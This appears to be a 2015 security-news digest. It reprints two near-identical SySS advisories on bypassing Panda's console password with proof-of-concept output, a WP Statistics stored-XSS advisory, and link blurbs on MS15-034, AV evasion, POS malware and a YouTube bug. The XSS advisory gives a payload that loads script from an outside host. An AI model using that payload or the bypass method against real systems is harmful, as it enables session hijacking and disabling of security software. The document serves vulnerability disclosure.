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[SYSS-2015-014] Panda Global Protection 2015 - Authentication Bypass

Advisory ID: SYSS-2015-014
Product: Panda Global Protection 2015
Vendor: Panda Security
Affected Version(s): 15.1.0
Tested Version(s): 15.1.0
Vulnerability Type: Authentication Bypass Using an Alternate Path or
Channel (CWE-288)
Risk Level: Medium
Solution Status: Not fixed
Vendor Notification: 2015-02-27
Solution Date: -
Public Disclosure: 2015-04-14
CVE Reference: Not yet assigned
Author of Advisory: Matthias Deeg (SySS GmbH)



Panda Global Protection 2015 is an endpoint protection software with
many features defending users against different threats.

The vendor Panda Security describes the product as follows (see [1]):

"Everything you need to protect your PC, Mac® or Android™, your data and
family against all types of threats, even those as yet undiscovered, is
included in our antivirus software. Enjoy real time protection against
the latest malware. Surf, shop and play online with complete peace of


Vulnerability Details:

The endpoint protection software Panda Global Protection 2015 offers a
password protection in order to restrict access to the management
console. With an enabled password protection, changing settings or
deactivating the protection features requires the set password.

By analyzing the password-based authentication of the implemented
password protection, the SySS GmbH found out, that the password
comparison is done within the process PSUAMain.exe (actually within the
used module PSUNConsole.dll), which runs in the context of the current
Windows user, who can also be a standard, limited user.

This fact allows a further analysis and the manipulation of the password
comparison during runtime without administrative privileges, as every
user is able to debug and manipulate the processes running with her user

In order to bypass the password-based authentication, for example to
deactivate the protection of Panda Global Protection 2015 in an
unauthorized manner, an attacker only has to patch this password
comparison, so that it always returns true, for example by comparing the
correct unload password with itself or by modifying the program control

The SySS GmbH also found out, that the actual set password for the
password protection can be extracted as cleartext during runtime from
the process PSUAMain.exe.

Thus, a limited Windows user or malware running in the context of such a
user is able to deactivate Panda Global Protection 2015 in an
unauthorized manner and furthermore to extract the actual password as


Proof of Concept (PoC):

The SySS GmbH developed a proof-of-concept software tool named
UnloadPanda for deactivating the Panda protection in an unauthorized

The following output exemplarily shows a successful bypass of the
password-based authentication and of the cleartext password extraction:

/ _____ _____ _____ \
/ / ___| / ___/ ___| \
| \ `--. _ _\ `--.\ `--. |
| `--. \ | | |`--. \`--. \ |
| /\__/ / |_| /\__/ /\__/ / |
\ \____/ \__, \____/\____/ ... unloads Panda! /
\ __/ | /
/ |___/ _________________________________________/
/ _________________/
(__) /_/
/ |____||
* || ||
^^ ^^
SySS Unload Panda Protection v1.0 by Matthias Deeg - SySS GmbH (c) 2015

[+] The Panda process was patched successfully.
Now you can unload the Panda protection with an arbitrary password.
After entering an arbitrary password, the correct one will be shown.
[+] The correct password is: s3cret1!



The SySS GmbH is currently not aware of a solution for the reported
security vulnerability.

Please contact the vendor for further information.


Disclosure Timeline:

2015-02-27: Vulnerability reported to vendor
2015-03-06: Reported vulnerability again as the vendor did not reply to
to the first e-mail with the SySS security advisory
2015-03-06: Vendor acknowledges e-mail with SySS security advisory and
opens a case
2015-04-14: Public release of security advisory according to the SySS
Responsible Disclosure Policy



[1] Product Web site for Panda Global Protection 2015
[2] SySS Security Advisory SYSS-2015-014
[3] SySS Responsible Disclosure Policy



This security vulnerability was found by Matthias Deeg.

E-Mail: matthias.deeg (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = 5AE3 96EE A014 FB90 9D81 AF90 8C54 7E88 A34C CED8



The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web



Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Panda Gold Protection 2015 - Authentication Bypass

Advisory ID: SYSS-2015-015
Product: Panda Gold Protection 2015
Vendor: Panda Security
Affected Version(s): 15.1.0
Tested Version(s): 15.1.0
Vulnerability Type: Authentication Bypass Using an Alternate Path or
Channel (CWE-288)
Risk Level: Medium
Solution Status: Not fixed
Vendor Notification: 2015-02-27
Solution Date: -
Public Disclosure: 2015-04-14
CVE Reference: Not yet assigned
Author of Advisory: Matthias Deeg (SySS GmbH)



Panda Gold Protection 2015 is an endpoint protection software with many
features defending users against different threats.

The vendor Panda Security describes the product as follows (see [1]):

"Everything you need to protect - your PC, Mac® or Android™, your data
and family - against all types of threats, even those as yet
undiscovered, is included in Panda Gold Protection. Enjoy real time
protection against the latest malware. Surf, shop and play online with
complete peace of mind."


Vulnerability Details:

The endpoint protection software Panda Gold Protection 2015 offers a
password protection in order to restrict access to the management
console. With an enabled password protection, changing settings or
deactivating the protection features requires the set password.

By analyzing the password-based authentication of the implemented
password protection, the SySS GmbH found out, that the password
comparison is done within the process PSUAMain.exe (actually within the
used module PSUNConsole.dll), which runs in the context of the current
Windows user, who can also be a standard, limited user.

This fact allows a further analysis and the manipulation of the password
comparison during runtime without administrative privileges, as every
user is able to debug and manipulate the processes running with her user

In order to bypass the password-based authentication, for example to
deactivate the protection of Panda Gold Protection 2015 in an
unauthorized manner, an attacker only has to patch this password
comparison, so that it always returns true, for example by comparing the
correct unload password with itself or by modifying the program control

The SySS GmbH also found out, that the actual set password for the
password protection can be extracted as cleartext during runtime from
the process PSUAMain.exe.

Thus, a limited Windows user or malware running in the context of such a
user is able to deactivate Panda Gold Protection 2015 in an unauthorized
manner and furthermore to extract the actual password as cleartext.


Proof of Concept (PoC):

The SySS GmbH developed a proof-of-concept software tool named
UnloadPanda for deactivating the Panda protection in an unauthorized

The following output exemplarily shows a successful bypass of the
password-based authentication and of the cleartext password extraction:

/ _____ _____ _____ \
/ / ___| / ___/ ___| \
| \ `--. _ _\ `--.\ `--. |
| `--. \ | | |`--. \`--. \ |
| /\__/ / |_| /\__/ /\__/ / |
\ \____/ \__, \____/\____/ ... unloads Panda! /
\ __/ | /
/ |___/ _________________________________________/
/ _________________/
(__) /_/
/ |____||
* || ||
^^ ^^
SySS Unload Panda Protection v1.0 by Matthias Deeg - SySS GmbH (c) 2015

[+] The Panda process was patched successfully.
Now you can unload the Panda protection with an arbitrary password.
After entering an arbitrary password, the correct one will be shown.
[+] The correct password is: s3cret1!



The SySS GmbH is currently not aware of a solution for the reported
security vulnerability.

Please contact the vendor for further information.


Disclosure Timeline:

2015-02-27: Vulnerability reported to vendor
2015-03-06: Reported vulnerability again as the vendor did not reply to
to the first e-mail with the SySS security advisory
2015-03-06: Vendor acknowledges e-mail with SySS security advisory and
opens a case
2015-04-14: Public release of security advisory according to the SySS
Responsible Disclosure Policy



[1] Product Web site for Panda Gold Protection 2015
[2] SySS Security Advisory SYSS-2015-015
[3] SySS Responsible Disclosure Policy



This security vulnerability was found by Matthias Deeg.

E-Mail: matthias.deeg (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = 5AE3 96EE A014 FB90 9D81 AF90 8C54 7E88 A34C CED8



The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web



Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

MS15-034 (CVE-2015-1635) Checker & PoC on Pastebin

Danger! This script has not been properly qa'd and will probably fail in terrible ways.
It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
an HTTP range request here......http://pastebin.com/ypURDPc4

As a reminder MS15-034 is the Vulnerability in HTTP.sys Which Could Allow Remote Code Execution. More info here..........https://technet.microsoft.com/library/security/MS15-034

Pastebin PoC......http://pastebin.com/wWGFFZpG

SideStep: Another AV Evasion Tool

A few years ago I was working on a basic penetration test and came across a remote code execution vulnerability. I tried using Metasploit to deliver a payload but it became evident that the host’s antivirus software was removing the executable. This was shortly after the initial release of Veil and I was unfamiliar with that tool at the time. I wanted to use Metasploit to control the host and perform various actions so I began researching how to modify the payload and deliver it in a way that would bypass the AV solution.

more here.........https://www.codewatch.org/blog/?p=415

BetrFS: A Right-Optimized Write-Optimized File System

The Bε-tree File System, or BetrFS, (pronounced “better eff ess”) is the first in-kernel file system to use a write-optimized index. Write optimized indexes (WOIs) are promising building blocks for storage systems because of their potential to implement both microwrites and large scans efficiently.

Previous work on WOI-based file systems has shown promise but has also been hampered by several open problems, which this paper addresses. For example, FUSE issues many queries into the file system, superimposing read-intensive workloads on top of writeintensive ones, thereby reducing the effectiveness of WOIs. Moving to an in-kernel implementation can address this problem by providing finer control of reads. This paper also contributes several implementation techniques to leverage kernel infrastructure without throttling write performance.

more here.......https://www.usenix.org/conference/fast15/technical-sessions/presentation/jannen


Wi-Fi on planes opens door to in-flight hacking, warns US watchdog

Analyzing Attacker's "Soft" TTP's with Splunk

One thing I've wanted to do with Tango was find a way to provide some sort of "attribution", or identify similarities in attackers as a way to group them together. I'm doing this "attribution" using a thing I'm calling "Soft TTP's" or Tools, Tactics and Procedures, which can help identify actor's based on how they act and what tools they are using.

more here.......http://nullsecure.org/analyzing-soft-ttps-in-splunk/

CVE-2015-1245 (Use-after-free in PDFium) PoC

Knowledge Fragment: Bruteforcing Andromeda Configuration Buffers

Remote Code Execution Via HTTP Request In IIS On Windows

New POS Malware Emerges - Punkey

During a recent United States Secret Service investigation, Trustwave encountered a new family of POS malware, that we named Punkey. It appears to have evolved from the NewPOSthings family of malware first discovered by Dennis Schwarz and Dave Loftus at Arbor Networks. While this malware shares some commonalities with that family, it departs from the standard operating procedure of the previous versions rather dramatically. In a blog post, TrendMicro also detailed recently compiled versions of the NewPOSthings family that bear a closer resemblance to NewPOSthings than Punkey. This suggests that multiple actors may be using similar source code, or the malware is being customized as a service for targeted campaigns

more here.............https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/?page=1&year=0&month=0

MS15-034 (CVE-2015-1635) https.sys Request Handling Vulnerability

Vulnerability in Youtube allowed moving comments from any video to another (Separate from the recent Youtube Delete Vuln)

Today, I’m going to write about an intriguing vulnerability I have found with my friend, Ibrahim M. El-Sayed in Youtube. The vulnerability allowed us to duplicate/copy any comments from any video on youtube to our video without any user-interaction.

Imagine for instance a celebrity or public figure leaving a comment on some video on Youtube saying “Wow, This is an Amazing Video“. You then come along, exploit that vulnerability, and quite simply make this comment appear on your own video instead. :D

The vulnerability also allows us to copy the comments on channels – AKA “discussion boards” – from any Youtube channel and make it appear as a comment on our video or as comment on our channel discussion board.

It is worth noting that a big segment of user engagement on Youtube is manifested through user comments on videos and on discussion boards. Theoretically, if you manage to find a good number of comments by a certain user, you can use them to impersonate that user. Thus, making copies of engagement gives you entry to impersonate users.

more here.........http://www.secgeek.net/youtube-vulnerability/

Wordpress WP Statistics persistent XSS

Stored XSS Vulnerability in WP Statistics Wordpress Plugin

. contents:: Table Of Content


* Title :Stored XSS Vulnerability in WP Statistics Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/wp-statistics/
* Severity: Medium
* Version Affected: 9.1.2 and mostly prior to it
* Version Tested : 9.1.2
* version patched: 9.1.3


Vulnerable Parameter

* Check for online users every:
* Coefficient per visitor:

About Vulnerability
This plugin is vulnerable to a Stored cross site scripting vulnerability,This issue was exploited when administrator
users with access to WP Statistics Setting in wordpress Above Vulbnerable parameter is vulnerable for stored XSS. A
malicious administration can hijack other users session, take control of another administrator's browser or install
malware on their computer.

Vulnerability Class
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Steps to Reproduce: (POC)

After installing the plugin

* Goto settings --> WP Statistics
* Put This payload in any above vulnerable parameter <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
* Click on the Save Changes you will see XSS in action
* Reload the page or re navigate to page to make sure its stored ;)

Update to 9.1.3

Change Log

14-April-2015 reported to developer
15-April-2015 Fix by developer
15-April-2015 Public Disclosure
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh () me com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

Node.Js Server-Side JavaScript Injection Detection & Exploitation

crossdomain.xml : Beware of Wildcards

The Growth Of the Info Security Arena Is Certainly Being Shown In That Cyber Security ETF Fund, Symbol "HACK"

Remember when  Purefunds ISE Cyber Security ETF just went public back in November 12th of last year when it was just $25.10. The ETF sells at 30 times earnings and is now currently trading at $29.45. Quite a few of these companies are growing at greater than 50 percent so maybe thats why 30 times earnings may not be so crazy. Not to shabby. Here is information on the fund and its holdings again if anyone is interested.....http://pureetfs.com/etfs/hack.html
I just thought it was interesting.....

Denial of Service Attacks Possible with OpenSSL Vulnerability CVE-2015-1787

On March 19 we wrote about how OpenSSL disclosed and fixed 13 vulnerabilities to address several security holes. Among the vulnerabilities addressed was CVE-2015-1787, which can result in a complete denial of service on an application compiled with OpenSSL library. This blog post will tackle how the bug can be exploited, and how Trend Micro can protect against future possible attacks.

CVE-2015-17187 also affects several protocols, including SSL/TLS and DTLS, which we will analyze in this entry here.......http://blog.trendmicro.com/trendlabs-security-intelligence/denial-of-service-attacks-possible-with-openssl-vulnerability-cve-2015-1787/

New Nmap NSE script to detect vulnerable MS Windows systems (MS15-034)

I came across this (http://pastebin.com/HeBDTenr<http://pastebin.com/HeBDTenr>) =) 

-- 80/tcp open http syn-ack
-- | http-vuln-cve2015-1635:
-- | Remote Code Execution in HTTP.sys (MS15-034)
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2015-1635
-- | A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
-- | caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
-- | successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
-- |
-- | Disclosure date: 2015-04-14
-- | References:
-- | https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635

Authored by Paulino Calderon Pale
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